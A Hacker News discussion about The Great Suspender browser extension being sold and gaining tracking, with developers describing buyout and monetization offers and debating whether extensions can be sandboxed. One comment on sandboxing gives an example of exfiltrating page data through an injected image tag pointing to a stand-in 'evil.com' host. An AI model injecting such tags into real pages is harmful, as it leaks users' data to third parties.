[HN Gopher] I no longer trust The Great Suspender
___________________________________________________________________
I no longer trust The Great Suspender
Author : davidfstr
Score : 758 points
Date : 2021-01-20 14:01 UTC (8 hours ago)
(HTM) web link (dafoster.net)
(TXT) w3m dump (dafoster.net)
| tra3 wrote:
| A reddit link, from the blog post [0] has all the details for
| those who don't use chrome.
|
| TLDR: A popular extension was quietly sold off to an unknown
| party that subsequently added tracking/analytics. Not
| specifically malware, but not trustworthy either.
|
| Did I miss anything?
|
| [0]:
| https://www.reddit.com/r/KyleTaylor/comments/jowlt2/open_sou...
| peanut_worm wrote:
| Why do people keep 100s of tabs open at a time? I get irritated
| if I have more than 8 open.
| eznzt wrote:
| Because they have not found the bookmarks feature yet.
| ortusdux wrote:
| When I have 100 tabs open, 90 of them are one time use pages.
| I need to compile bits of information from each page, and
| then I never need those pages again. Why would I use
| bookmarks?
|
| For example, last week I was shopping for a very specific,
| very expensive ceramic thrust bearing. I had 20+ pages open
| from 10+ suppliers and documentation sources. I needed those
| open all week while we decided on which one to buy. This was
| a minor background task, so I also had 60 other tabs open for
| my normal work flow.
|
| Just because people use a tool differently than you doesn't
| make them wrong.
| gmiller123456 wrote:
| It'd be great if someone invented a method of working with
| bookmarks that worked as easily and seamlessly as tabs.
|
| Back in the days of social bookmarks (like del.icio.us)
| pretty much everyone had a "toread" folder. The main problem
| is that you have to remember to delete them after reading
| them. That's not really a problem for good articles you
| remember reading, but the crap articles you don't remember,
| or quit reading are easy to forget to delete from the
| bookmarks. So, you end up reading the same crap articles
| several times. With a tab, you close the window and you're
| done. With bookmarks, you have to close the window, go
| through your bookmarks, find the one that was crap that you
| have already forgotten and delete it.
|
| There's several other advantages to tabs too:
|
| Like the fact that they're naturally organized by window
| based on the task you're doing.
|
| You'll see them more often, and thus be reminded more often.
|
| They save context, like forwards and back history, and
| information you may have typed in, or a UI you may have
| manipulated.
| edeion wrote:
| That brings me to the problem with links as well as with
| e-books: you don't usually see them. When you have an open
| tab, you see it all day long until you get rid of it. When
| you have a printed book, you bump in it on a daily basis
| (unless you hide it in more books).
| hungryforcodes wrote:
| Also bookmarks don't save page context. If I'm doing
| something -- even something simple like scrolling down a
| page -- and get interrupted, it's just easier to leave it
| open.
| superkuh wrote:
| Yep. Tab history is important. How I got to some page is
| almost as important as the page itself.
|
| I've been using large tab sessions ever since Opera 5 in
| the early 2000s. Back then I'd have 20-50 tabs or so.
| These days I have sessions of 500 active tabs and 500
| suspended. It's great. I have full text tab search, and
| since my sessions last years, I know the general location
| of all important tabs. ALso, since I use a single process
| brower and NoScript, all those 500+ tabs take under <3 GB
| of ram.
|
| It's matter of taste, but it's no new trend. Tabs, and
| tab users, have been around for 20 years now.
| jrockway wrote:
| https://xkcd.com/1172/
| sixothree wrote:
| Why do people not understand why I have 100s of tabs open? I
| get irritated when asked this question.
| nousermane wrote:
| Why indeed. Is that because bookmarks are too clumsy to use,
| and don't save your scroll position and other user input?
| redwall_hp wrote:
| Any time I'm working on something, I inevitably end up with
| 20-30 tabs with different things I'm referencing.
| Especially documentation. I think I have around 6-8 open
| when I'm not doing anything, since I pin some web apps
| (e.g. Facebook Messenger) or dashboards.
|
| It's also the best way to browse image galleries: middle
| click everything into new tabs, navigate them with the
| keyboard, and close them as you go. Beats clunky JavaScript
| lightboxes.
| blinding-streak wrote:
| Tabs are my lazy man's to-do list. Leaving them open saves all
| the context I need. Closing them means I have to spend effort
| to get them back.
| ortusdux wrote:
| Try the extension 'Session Buddy'. You can view all open tabs
| and windows, group them as needed, and then save, close, and
| reopen sessions and groups.
|
| I routinely research several related topics for a project, and
| I will need 10-30 tabs per topic open at once. Surprisingly,
| chrome manages to handle 100+ tabs on my system with out issue.
| angelbar wrote:
| Please dont have more than 8 tabs open... problem solved.
|
| Other persons have other treshold... and use cases.
|
| Some user support need many searches that will help if be
| documented later... if I bookmark all of them I will never do
| that.
| rbanffy wrote:
| I multitask. A lot. It's my job.
|
| You should see my desktop
| dbbk wrote:
| I'm a software developer and am always hovering around this
| mark. It's usually from digging through documentation, having
| multiple tabs with different areas of the app you're working on
| open, productivity tabs like Slack and Gmail, then personal
| tabs like Reddit and YouTube
| fancy_pantser wrote:
| As the developer of a pretty popular "utility" browser extension,
| I've been shocked by the volume of email I get every week about
| it.
|
| On a daily basis, I will get requests to sell the extension. Once
| or twice a week, I will receive an offer to add "a couple lines
| of code" to my extension which are always generously described as
| "allowed in the Chrome Web Store" by little fly-by-night
| organizations that only even have a landing page half the time
| and usually have throwaway-looking gmail accounts. Out of
| curiosity, I've asked a few what their code does and they never
| fully describe it, but it either collects analytics to ship home
| (my extension runs on all sites, so it's appetizing to them!) or
| places paid results at the top of any search results, for which I
| can make "thousands of dollars a month based on the number of
| North American users I have".
|
| Here is an example email I received yesterday. It's a good
| example of how they call it "an SDK" and looks like one of the
| more legit ones (they registered a domain to send email from, at
| least). We at [redacted] are considering
| purchasing the complete license and ownership of the extensions
| which have 50K+ active users, may I know if you would be
| interested in selling? If so, - what is your estimated price?
| Regarding the SDK monetization which we discussed earlier, as it
| is not distractive and is compatible with any other monetization.
| We have straightforward terms and provide support for your users
| agreement. Our partners generate 3-20 K USD monthly with our
| solution for the browser extensions. As a kind
| reminder, we are [redacted] -- a reputable global peer-to-peer
| ethical proxy network. All our clients are big reputable
| companies, we authorize their business before providing any proxy
| plans. Look forward to your further feedback and
| discussing further details of our financial proposal for your
| Software in a short Zoom call or here by emails.
|
| Finally, I am also hounded by teams at Microsoft and Apple, who
| want me to port the extension to their new plugin ecosystems so
| it can be featured/showcased. I worked with Apple on one similar
| thing for an extension and it caused such a huge jump in support
| and feature requests from users that I was overwhelmed, so I am
| not keen to do it again until I have more free time. They can't
| understand why I don't want to grow by tens of thousands of users
| a week, but I'm just one person and don't make money from it
| whatsoever.
| teachtyler wrote:
| Is this any different than Railway Programming? Or is this more
| specifically applicable to high order components?
|
| https://fsharpforfunandprofit.com/rop/
| LockAndLol wrote:
| > Finally, I am also hounded by teams at Microsoft and Apple,
| who want me to port the extension to their new plugin
| ecosystems so it can be featured/showcased.
|
| Do they ask you to do that for free or is there a monetary
| amount they tack on?
| reaperducer wrote:
| I have two thoughts about this.
|
| First, respond to every inquiry by telling them the price is
| USD$70,000,000.00. And stick to that price. Many of these
| sleazy companies get their leads from the same "lead
| generators," who will eventually take you off their lists
| because they know your terms are unreasonable. It doesn't work
| for everyone, but when I did it to spammers trying to buy my
| mailing list, it significantly reduced the volume of inquiries.
|
| Second, put a page on your web site listing all of the
| offending companies, with links to the letter you received.
|
| Apr 1, 2021 - Company X promised $3-5k/month if I alter your
| search results. Link.
|
| Apr 3, 2021 - Company Y promised $1-5k/month if I promote thier
| product on other people's web pages. Link.
|
| A lot of people on HN will claim "O, noes! Lawyers! Libel!" I
| wouldn't worry about it. These people don't have the money for
| lawyers, are usually in geographies without legal systems, and
| don't want their names and other information exposed in a
| public legal filing. Plus, all you're doing is stating facts.
| hinkley wrote:
| > by telling them the price is USD$70,000,000.00
|
| There's a W C Fields joke that ends, "Madame, we've already
| established what sort of woman you are, now we're just
| haggling over price."
| bluGill wrote:
| Every time they make a lower offer counter with a higher
| price. They will soon learn what kind of person they are
| dealing with.
|
| If they actually do come up with $120,000,000 - will at
| that point nobody will be surprised that you cashed out.
| They might be mad, but they won't blame you.
| AnIdiotOnTheNet wrote:
| Case in point: Notch once said that his price for selling
| out Minecraft was $2B. When Microsoft eventually said
| "sounds fair" and gave it to him very few people found it
| easy to be mad at him.
| cbhl wrote:
| I wonder what the calculus was on the Microsoft side of
| the equation.
|
| "It'd take more than 10-SWE-years to build a clone, so we
| should take his offer"?
| StellarTabi wrote:
| They rewrote anyways.
| mywittyname wrote:
| They are paying for the brand, not the product. Microsoft
| is ensuring that they have mindshare in the next
| generation of gamers. That's critically important to
| maintaining their ongoing success in the gaming sector.
|
| Similar to why Disney paid billions for Star Wars: the
| company was easily capable of replicating the product;
| the issue was replicating the brand. That brand has a
| proven track record of multi-generational appeal.
| ljm wrote:
| I think it's more than just the brand right? I can't
| speak for Disney and Star Wars because Star Wars was
| never my thing.
|
| These creative endeavours have a soul, or an essence, for
| want of a better term. You can replicate a game or a
| movie and it will feel utterly soulless compared to the
| original, even if you can't visibly notice a difference.
|
| You could reproduce Minecraft but even the most
| infinitesimal divergence from the original will make it
| feel fake. Maybe the controls have a different 'feel', or
| the way the scene is rendered feels a bit off. It's just
| not Minecraft any more. There are just so many quirks and
| details that will be lost in the translation, or even
| patched over if they're seen as bugs.
|
| It's no different if you ported a game from Unity to
| Unreal and then to CryEngine. I'm sure that with a blind
| comparison you would be able to 'feel' the difference.
|
| And the same for films. The way these things were created
| has a lot of influence over the end result.
|
| On the other hand, it's exactly what can make a remake or
| remaster so successful. The Resident Evil 2 and 3 remakes
| that followed Resi 7 were phenomenal! Not totally
| faithful to the originals, didn't try to be...they just
| took an older game and gave it a new life.
| citizenkeen wrote:
| I think you've just described a brand.
|
| People don't go to Starbucks because it's the best, they
| go to Starbucks because mocha frappucinos in Lima and
| London taste exactly the same. Any divergence, even an
| infinitesimal one, makes the frap feel fake.
| brownbat wrote:
| Reminds me of the quests to recreate the secret recipe
| for Coca-cola.
|
| The secret ingredient isn't orange peel, it's $4 billion
| a year in marketing.
| TedDoesntTalk wrote:
| You could recreate the brand and the product, and you
| still won't have millions of users playing it. They
| bought the user base, too.
| wpietri wrote:
| A brand is not just trade dress. It's a relationship
| between a company and the public. Recreating the brand
| means building those relationships.
| slongfield wrote:
| To be fair, people found plenty of other things to be mad
| at Notch about.
| drewwwwww wrote:
| that was not what people got mad at notch about
| newnamenewface wrote:
| People got mad at Notch for internet-age old reasons:
| expecting someone with high technical skills in one
| domain to have the right takes on social and political
| issues because they're now a internet social presence in
| addition to whatever creative work they've done. If
| people were realistic in their expectations of Notch,
| they'd never have been mad in the first place because
| they wouldn't have cared what inane ideas he spouted.
| grecy wrote:
| My buddy loves buying and selling stuff from the local
| newspaper. Whenever people give a low ball offer he looks
| them directly in the face and in a very confident manner
| says: "I'm accepting asking price or anything higher!"
|
| The looks on people's faces are incredible.
| madeofpalk wrote:
| I have no problem being "that sort of women" for
| USD$70,000,000.00, over a browser extension.
| Dylan16807 wrote:
| There's a big difference between retirement money and day-
| job money, which applies both to this and the joke.
| mcjiggerlog wrote:
| I also have some extensions with users in the tens of thousands
| and can corroborate all of this. Out of curiosity I strung one
| "buyer" along to see how much they would offer and they quoted
| $0.20 per user. With the amount of money being thrown about, as
| sad as it is, it's no surprise that some devs end up selling
| out their users.
|
| In my opinion extensions have to be one of the worst sources of
| spyware these days. I am now extremely conservative with what
| extensions I use, and definitely would only use extensions from
| open source projects or companies that I trust.
|
| Something needs to change. As long as extensions have such weak
| sandboxing along with such poor app review, Google/Mozilla etc
| will keep willingly shipping spyware unbeknownst to their
| users.
|
| At least some mechanism of creating and verifying reproducible
| builds would go a long way.
| Someone wrote:
| If you can make thousands a month on tens of thousands of
| users, that's (very much ballpark) $0.10 per user per month.
|
| Paying $0.20 per user to buy that seems extremely low.
|
| Also, on the sandboxing/app review of extensions, does
| anybody know how well Apple vets Safari extensions? (I guess
| that could be hard if the evil parts are time-triggered,
| certainly if the code also is obfuscated (possibly in the
| name of minification)
| SamBam wrote:
| Who said they were earning thousands a month for their
| extension?
| wffurr wrote:
| If the malware seller can make $0.10 / user / month, then
| paying the extension developer a one-time fee of $0.20 *
| users is only three months to pay back. Thus considered a
| low price for the extension developer but still
| attractive to the extension developer who likely earns $0
| / user from their extension.
| koheripbal wrote:
| The only extensions I have are privacy extensions. Do people
| on here really install a bunch of random 3rd party
| extensions?
| Scoundreller wrote:
| Privacy extensions can be crap too. Cutting off web-based
| analytics makes the telemetry from those users much _more_
| valuable.
|
| Ghostery anyone?
|
| https://www.reddit.com/r/privacy/comments/59wiln/is_ghoster
| y...
| marcus_holmes wrote:
| probably not on here no. But out there... definitely yes.
| rsync wrote:
| "In my opinion extensions have to be one of the worst sources
| of spyware these days. I am now extremely conservative with
| what extensions I use, and definitely would only use
| extensions from open source projects or companies that I
| trust."
|
| I completely agree. There are a number of features I would
| really like to use in Firefox that are available only as
| extensions and I continue to resist installing them.
|
| In fact, the only extension I use is uBlock origin - which is
| based on a fairly rich social and community history behind
| that project and its author ...
| TedDoesntTalk wrote:
| Stick to the Firefox Recommended Addons list. Those are the
| only ones which are code reviewed by real people.
|
| And uBlock Origin is in that list.
| marcus_holmes wrote:
| Also, a business model for extensions would be good - even if
| it's just an official "tip box" that enthusiastic users can
| pay into
| milankragujevic wrote:
| Is this Luminati? [0] Because this sounds so much like Luminati
| ("Hola").
|
| [0] https://luminati.io/
| nitrogen wrote:
| Do extensions require any permissions to make requests? It
| seems like a strict sandbox that prevents data from flowing out
| of a page via an extension would help, if the extension is
| something like a JSON renderer.
| londons_explore wrote:
| Most extensions need the ability to modify webpages. With
| that ability, they can easily exfiltrate data by for example
| adding a <img src=evil.com/?data=82374682376>.
|
| Trying to sandbox an extension that can modify arbitrary
| webpages in arbitrary ways is near futile.
| angry_octet wrote:
| Couldn't CSP be used to limit which paths were valid URLs?
|
| There could also be hierarchies of extension permissions,
| because they don't all need to be able to do everything.
| gruez wrote:
| extensions can also remove/add CSPs I think, either
| through modifying the header or modifying the DOM.
| angry_octet wrote:
| Yes, but you could strictly limit which extensions had
| that permission, make it a site specific permission, etc.
| Auto disabling an extension that changes to require that
| permission would be a start.
| nitrogen wrote:
| _Trying to sandbox an extension that can modify arbitrary
| webpages in arbitrary ways is near futile._
|
| Just don't let them create _script_ elements, or add any
| URLs that don 't come from within the extension bundle
| itself. Browsers already have to do a ton of bookkeeping to
| track the origins of requests anyway. Doesn't seem hard,
| you just have to be thorough.
| londons_explore wrote:
| There would be ways to trick the original page into
| adding stuff for you.
|
| For example, you could patch some of the original script
| of the page and wait for it to be run.
| Dylan16807 wrote:
| Restricting the extension to pre-baked URLs means it
| takes several page loads to exfiltrate something, but
| doesn't stop it.
| MetalGuru wrote:
| Crazy. Can I ask what extension this is? Wish I had the problem
| of tens of thousands of new users wanting my product weekly :)
| wlesieutre wrote:
| Per an older comment, it's for pulling recipes off of awful
| recipe blogs. Having stumbled into recipe blogs before, the
| demand is understandable!
|
| https://chrome.google.com/webstore/detail/recipe-
| filter/ahlc...
| nonbirithm wrote:
| I find it so ironic they'd buy out am extension
| specifically designed to defeat SEO blogspam, just to
| insert analytics based monetization instead.
| Syntaf wrote:
| Going one step further, I found AnyList[1] on this forum
| awhile back and they also have a similar extension for
| extracting recipes from awful blogging sites.
|
| The added benefit with AnyList is that you can import
| ingredients directly into your grocery list from the
| extension. Been a huge time saver for me
|
| [1] https://www.anylist.com/
| joshstrange wrote:
| Paprika [0] can also parse any blog/recipe site and
| import the recipe. Then you can add items from recipes to
| your shopping list. I highly recommend this app, I've
| converted many friends over to it. It's a much better
| experience than trying to scroll through a blog post
| while cooking.
|
| [0] https://www.paprikaapp.com/
| wpietri wrote:
| Paprika is so good! There are a bunch of fit-and-finish
| details that tell me that it's being made by people who
| use it and who really care about listening to users.
| beepboop43 wrote:
| I'll add that I recently found how well Paprika handles
| printing recipes you have in your library. I wanted to
| print off a bunch of recipes to put in a binder and was
| very happy with how clean and simply formatted each
| recipe was, often with room to write notes on the paper.
| My only wish is they would implement a "family" option
| where I could easily share my library of recipes with my
| girlfriend without having to share them one at a time.
| zerd wrote:
| > My only wish is they would implement a "family" option
| where I could easily share my library of recipes with my
| girlfriend without having to share them one at a time.
|
| I thought that was the paid Cloud Sync feature was for.
| Does it not work for that?
| djrogers wrote:
| > My only wish is they would implement a "family" option
| where I could easily share my library of recipes with my
| girlfriend without having to share them one at a time.
|
| My wife and I work around that by simply using the same
| paprika account for cloud sync...
|
| Paprika is a huge time and sanity saver for me - it'd be
| totally possible, but much harder for me to cook for big
| events without it!
| wlesieutre wrote:
| I love Paprika, my one complaint about it is that you
| have to be careful with the ingredients multiplier
| feature. It only touches the number at the start, so "1
| large onion thinly sliced, about 2 cups" turns into "2
| large onion thinly sliced, about 2 cups."
|
| If you're not paying attention you can miss that it
| really needs 4 cups.
| joshstrange wrote:
| Agreed, I've run into the same issue. I had hoped that
| the numbers row they show above the keyboard (on mobile)
| meant they were "special numbers" that would scale but
| alas it only scales the first number AFAICT.
| joshstrange wrote:
| > My only wish is they would implement a "family" option
| where I could easily share my library of recipes with my
| girlfriend without having to share them one at a time.
|
| I normally abhor "social" features being tacked on when
| they aren't useful but I'd pay for all the apps over
| again for this feature. Thankfully the API is pretty
| straightforward. This repo of mine [0] is super dated but
| it was still working the last time I played with
| Paprika's API.
|
| I've toyed around with setting up a little web app that
| my friends can log-in with their paprika creds (I know, I
| know, but I'd tell them to use a 1-off password for this)
| so that they can use the web app either push or pull
| recipes from each other.
|
| Thankfully you can send the full paprikarecipe file via
| email and import it but it's a little clunky and things
| like Discord (which my friends use to chat) doesn't like
| file extensions over 12 characters (IIRC) so it just cuts
| off the rest of the extension characters leaving you with
| a file you can't open (without fixing the extension). I
| have some initial work to setup an AWS SES address that
| people can send recipes to that will then drop a preview
| and link to download (not an attachment, it would be
| hosted on S3) the recipe into a "recipes" Discord channel
| we use but it's still a WIP.
|
| [0] https://github.com/joshstrange/paprika-api
| [deleted]
| hosteur wrote:
| What is your extension called?
| fancy_pantser wrote:
| Recipe Filter:
| https://chrome.google.com/webstore/detail/recipe-
| filter/ahlc...
| criddell wrote:
| Why redact? I'm curious about who is doing this.
| rsync wrote:
| Agreed. These people need to be named and shamed.
| boomboomsubban wrote:
| It'd be annoying for the poster if they got mad, with an
| unlikely but potential legal encounter involved, and 99.9%
| of the community will never interact with the company. Even
| the few that do would likely realize their scummy business
| strategy immediately. Not worth it here.
| jrochkind1 wrote:
| With that kind of money being offered (assuming it is in the
| ballpark of true)... I wonder how many popular free extensions
| already have some of that junk in it and nobody's noticed.
| Maybe many of them? I could see a lot of devs who started out
| writing an extension as a non-paying hobby, having trouble
| turning down the free money.
|
| I feel like this is another prong in the story about threats to
| sustainability of open source done the way it used to/has been
| done previously.
| ryanlol wrote:
| > assuming it is in the ballpark of true
|
| It is. It's very easy to generate big money with ad
| replacement or proxies.
| greenshackle2 wrote:
| Some years ago I applied at a "data analytics" startup
| founded by a locally famous founder. Their official purpose
| was something something search something social media. Not
| in the US, but he was featured on our local version of
| Shark Tank at some point.
|
| During interview it became clear that their "product" was
| actually bundled malware that replaced google's and other
| ads in the browser. Evidently hot founder guy was using
| this startup as cash cow for his other ventures.
|
| There was some noise in the press about it a couple years
| later and founder guy defended himself saying he sold the
| company and wasn't responsible, except it was already
| malware when I interviewed and he was still owner so I know
| it's bullshit.
| JeanSebTr wrote:
| He is well known for that in the local startup crowd ;)
| tornato7 wrote:
| And it's something I'm surprised Google hasn't done more to
| stop considering these people are basically stealing their
| revenue in their own browser
| ugh123 wrote:
| Ask Apple or Microsoft for a full time job to work on it =)
| l3s2d wrote:
| Did Apple compensate you for your work porting your extension?
| fancy_pantser wrote:
| No, but Apple and MS both consider the increased visibility
| and growth in user count from being "featured" in their
| marketplaces as a nice bonus for the developer. If I were a
| business generating revenue from app subscriptions, I'd jump
| all over it.
| thwarted wrote:
| "We can't pay you, but you'll get exposure"
| sokoloff wrote:
| Said every ad platform ever.
| haukilup wrote:
| For a couple projects and apps I worked on, exposure in
| one of these stores would be worth a decent amount of
| engineering effort. You can convert that exposure into
| users, marketing "buzz", validation of the apps worth to
| third parties, etc.
|
| This isn't universal, of course. But not all payment
| comes in liquid form!
| redwall_hp wrote:
| And in Apple's case, you can pay $99/year for the
| exposure...
| [deleted]
| noizejoy wrote:
| > "We can't pay you, but you'll get exposure"
|
| ... said the venue owner to the musician.
|
| It's a frighteningly common invit^H^H^H^H^H^H
| exploitation providing free labour to owners of gathering
| places benefitting from that labour (like bars and
| browsers and operating systems and social networks, etc).
| kazinator wrote:
| Why should the venue owner pay the musician?
|
| It's not an iron-clad given that the musician provides
| value to a venue.
|
| Musicians who are confident they can bring business to a
| venue negotiate with confidence and get paid.
|
| Those who play for free are ones who don't have that
| confidence.
|
| What you accept is what you cost. That's the market rate.
|
| How about this argument. Say I have a restaurant.
| Typically that means there is some landlord, and I pay
| them utilities and rent in exchange for using the space.
| Now some guitar-strumming, crooning ape wants to perform
| in the same space. If he and I are to be considered part
| of the same organization, we are on the same level of the
| "org chart". We are sharing the space and doing our
| thing. Why would I pay him anything? He should pay part
| of the rent and utilities. Or, why not the other way
| around?
|
| Let's reverse it. Suppose a musician has a venue where he
| performs every night, and people come. Paying people.
| Suppose I want sell hot-dogs and sandwiches there, and he
| lets me do that. Why the fuck should he also pay me
| anything? He would be right to ask me to pay some sort of
| rent.
|
| Now if I give the hot dogs and sandwiches for free, so
| that many more people come, and those people pay to get
| into this music venue, then there is a case that I'm
| increasing the business, and doing it out of my pocket.
| Still, that is my problem; I shouldn't be doing such a
| thing. Maybe I know what I'm doing! Or maybe I'm trying
| out new product to see how people like it or whatever
| (market research).
| worik wrote:
| " Why should the venue owner pay the musician?"
|
| Because a music venue without musicians insn't
| sokoloff wrote:
| But a dive bar is a still a dive bar and a casual
| restaurant still a restaurant...
| [deleted]
| kazinator wrote:
| A dive bar is still a place where people pay for drinks,
| and not for music.
|
| The "open mic" is on Tuesday nights, because nobody goes
| there then, so there is no harm to the business, and the
| people who come to have open mic fun might buy drinks.
| kazinator wrote:
| No, it isn't a music venue without musicians.
|
| But the implied flow of money doesn't follow from that.
|
| Suppose I own an empty space with a little stage, a PA
| sound system, and some 100 chairs. I put a down payment
| on this place, paid for equipment and upgrades and have
| to pay property taxes, utilities and mortgage. If nothing
| happens there, I lose money out of my own pocket. I
| intend for it to be a music venue. I meet the definition
| of a music venue owner.
|
| Some musicians have contacted me and would like to have a
| concert there.
|
| Should anyone pay anyone? Who should pay whom?
|
| How is this for logic: "A house isn't a home without a
| family! If you want me to move into this house with my
| wife and three kids to make it a home, you're gonna have
| to pay me!"
| bluGill wrote:
| If you are generating revenue exposure can be very
| useful. However if you don't already have a good business
| model it just digs your hole deeper. Be very careful to
| be sure which you are in.
| EGreg wrote:
| Thank you for sharing this, fancy_pantser. Are you the current
| maintainer also, or the current developer?
|
| This is what capitalism looks like, folks. Someone "built it"
| so they now privately "own it", no matter how big it gets. It's
| not put into the hands of an organization. The profit motive is
| quite strong, which is why someone can be "corrupted" by very
| tempting messages like this. If you had a lake or a forest
| privately owned by one or two people, and they had a lot of
| debts, they could easily sell it to polluters and loggers.
|
| Some people scoff and say "socialism has been tried, it never
| works." I admit that socialism simply trades one class of
| elites (the capitalists with a lot of shares) for another (the
| bureaucrats with a lot of political clout). BUT! I would like
| to say that _socialism is not the only alternative_. The other
| alternative is _decentralized systems with no private
| ownership_. I 'm talking about science, open source software,
| and so on. There can be a Merkle tree of version updates (e.g.
| git version control) and each one can have various reputable
| organizations (like Zagat for software) building their
| reputation vetting it. Then, each community would run their own
| app store (think Wordpress plugins) which would work with these
| reputable organizations. There would be no heroes, no
| celebrities, no tweets at 3 am to 5 million people, no pulling
| from repos without peer review, no scientists instantly
| believed after publishing on arxiv.org .
|
| Congratulations for building a popular extension,
| fancy_pantser. You live in a world where you it's really bad to
| "criticize the profit", and where building it means you are
| responsible for it no matter how big it gets, but then we are
| all depending on your integrity and ability to rebuff life-
| changing amounts of money to _not_ mine our data. We can pass
| laws to punish people after the fact, or we can gradually
| change our culture by rejecting "immediate gratification" of
| updates that are not vetted, just as corporations have done
| with bleeding edge vs stable Linux distros etc. Unfortunately,
| the Web has made it so that anything can be updated at any
| time, with no sysadmins or reviewers in the loop. It's a wonder
| more malware isn't silently everywhere already.
| throwawa66 wrote:
| It's incredible how much downvotes you got for this without
| any explanation. Your proposal sounds sensible and I agree
| that we need to find a new system. It doesn't have to be this
| that you described but we should be open to change.
| Capitalism the way it is leads us in the wrong direction and
| socialism doesn't fare too much better in practice. We need
| to redraw a plan for the 21st century
| Qwertious wrote:
| If I were to guess, it's down voted because when SKIMMED,
| it sounds like an off-topic, far too long, and overly
| political comment.
|
| It's a fair comment, but only if you actually read it.
| vinay_ys wrote:
| https://news.ycombinator.com/newsguidelines.html might be
| the reason why a lot of things here got downvoted.
| Specifically:
|
| Please don't use Hacker News for political or ideological
| battle. It tramples curiosity.
| bjoli wrote:
| Discouraging political discussions is a very political
| thing in itself. The comment we are discussing might not
| be a great example of encouraging curiosity, but being
| the person that says "don't be so political" is
| complacent and ignorant. We arrived at the current
| situation due to political decisions and a political
| process.
|
| I am not accusing you of being that person, not anyone
| else. I am just tired of people not seeing that upholding
| the current situation is as political as criticizing it.
| This discussion made me try to put it in words.
| pksebben wrote:
| this doesn't read like a battle, though. one could argue
| that opinions that run counter to the generally accepted
| norm are inherently good for curiosity.
| EGreg wrote:
| It is indeed incredible. As I said, you cannot "criticize
| the profit" in the USA without losing social standing.
| Capitalism is a national religion because people think the
| only alternative is socialism (collective ownership of the
| means of production - which btw isn't scary on small
| levels) and the USA fought a cold war with USSR for
| decades.
|
| That's why there will be a third party in the USA that
| unites disaffected progressives on the left with
| disaffected paleoconservatives on the right. A lot of
| people are fed up with the divisions.
|
| I welcome counterpoints and debate but as you can see --
| there are just silent downvotes instead
| isoskeles wrote:
| You're probably being downvoted because even if your
| critique might be thoughtful at some parts, it is also
| quite snarky and smarmy at the beginning, and sounds like
| it's posing an ideological battle. Starting at the third
| sentence, _" This is what capitalism looks like, folks."_
| In fact, you're still doing it, _" Capitalism is a
| national religion..."_
|
| Do you think people on HN want to engage with your
| comments when you're saying they're foolishly clinging to
| a religious belief?
|
| By the way, this was a decent point: _" [W]e are all
| depending on your integrity and ability to rebuff life-
| changing amounts of money to not mine our data."_ Maybe
| this thread would be different if you stayed with points
| like that instead of accusing people of harboring
| religious beliefs that pulls the wool over our eyes,
| preventing us from seeing things your way.
| filleduchaos wrote:
| > Do you think people on HN want to engage with your
| comments when you're saying they're foolishly clinging to
| a religious belief?
|
| To be fair _you_ inserted "foolishly clinging", and are
| now blaming them for something they did not actually
| say.'
|
| Capitalism _is_ highly akin to religion - they 're not
| the first and will not be the last to draw that
| comparison, and plenty of words have already been written
| on the topic. If your response to reading "capitalism is
| a national religion" is to assume you're being insulted,
| perhaps consider that the statement may be more true than
| you think.
| worik wrote:
| Off topic, but....
|
| There is unlikely to be a third party in USA as the
| system is designed to have two parties.
|
| There may be a third party that forces the Dems and GoP
| to unite, back to two...
| richardwhiuk wrote:
| > decentralized systems with no private ownership
|
| aka anarchy. that turns out to be worse.
| worik wrote:
| What is your evidence?
|
| Mackknovist Ukraine, Spanish Republic, and Zapitista
| country now...
|
| All were/are quite different. Worse than what?
| EGreg wrote:
| Anarchy is simply absence of tall hierarchies.
|
| You can have each individual community choose what
| OpenStreetMap tiles to use, what to censor etc.
|
| Like HN does. What if HN was kicked off a host? They would
| put the backups somewhere else and repoint the DNS.
|
| What if ICE seized their domain? Then we could move domain
| name resolution to a DHT.
|
| What if AT&T refused to carry it or charge extra? The
| signal could route packets along other lines. No single
| point of failure.
|
| It's not just about banning 0% or 100% but the prices and
| friction imposed by privately owned rentseeking
| infrastructure monopolies. Why in a span of less than 10
| years, VOIP has caused international calls that used to
| cost $3 a minute to turn free and have video!
|
| The weird thing is that when A wants to connect woth B you
| think there has to be a one-size-fits all C that can block
| it.
| worik wrote:
| "Anarchy is simply absence of tall hierarchies"
|
| No it is not!
| ohgodplsno wrote:
| Ah, yes, the little project known as Debian completely
| failed and never took off. Anarchy is so bad. How could it
| ever produce anything of value, like say the world's most
| used linux distribution?
| andrepd wrote:
| Yes, as we all know, open source software is a failed
| experiment, a cesspit of "anarchy".
| vlovich123 wrote:
| Not open source. Open source is a resounding success. The
| marketplace with the problems is advertising. We need to
| enact laws banning selling of third party data and make
| leaks a liability (perhaps even one that automatically
| pierces the normal corporate veil and opens VPs and up to
| personal liability if there was any circumvention
| initiated encouraged by them). Then businesses have to
| actually decide if the liability is worth it for them vs
| a free-for-all market that intelligence agencies and
| criminal enterprises are primarily funding.
| EGreg wrote:
| As well as science, language and other human endeavors.
| No one is in charge! I'm glad society advanced so much
| from secret alchemy cults with their "intellectual
| property" protections on their secrets.
| mixmastamyk wrote:
| That's a good description. A successful cesspit of
| anarchy.
| jbman223 wrote:
| Most open source software is neither decentralized nor
| publicly owned.
| TuringTest wrote:
| All of it is, otherwise it wouldn't meet the 4 freedoms
| that define open source.
|
| The 'project' maintaining the software may be
| centralized, but all its users "own" the software in the
| sense that the don't need to ask permission to the
| maintainer, and they can create their own modifications.
| hojjat12000 wrote:
| You're mixing a few different things. Free software and
| open source are different. and for each of them there are
| hundreds of different licenses that allows you to do
| something but not another.
| TuringTest wrote:
| Free software and open source are _different marketing
| strategies_ for the same concept. The most commonly
| understood meaning for both terms is the same, from the
| very moment the Open Source Initiative was created.
| gmiller123456 wrote:
| It seems you've misinterpreted the poster's intentions as if
| it should be illegal for a developer to do this. But he/she
| was merely informing users, and well informed customers is a
| requirement for capitalism to work.
|
| The cost of using this extension is your information, and
| there are other products available that do the same thing at
| a lower cost. Based on the most fundamental concept of
| economics (supply and demand), "The Great Suspender" should
| fail as a product very quickly.
| djrogers wrote:
| > so I am not keen to do it again until I have more free time
|
| Aww man, I'm really sad to here that RecipeFilter won't be
| coming to Safari anytime soon. I really got my hopes up after
| it was in the keynote!
|
| Since Apple distributes extensions in the App Store, have you
| though about charging a buck or two for the Safari version? I
| know everyone says this, but I'd pay...
| kazinator wrote:
| > _what is your estimated price?_
|
| Say, $5 per active user; non-exclusive license: I can maintain
| my fork of the extension, and use any of the code in new
| projects.
| bombcar wrote:
| I feel there's a moneymaker here - create a popular open source
| extension, sell it off when you get a good deal, fork the code
| and let everyone find out the old version is "evil".
| twunde wrote:
| For those interested in understanding the security of Chrome
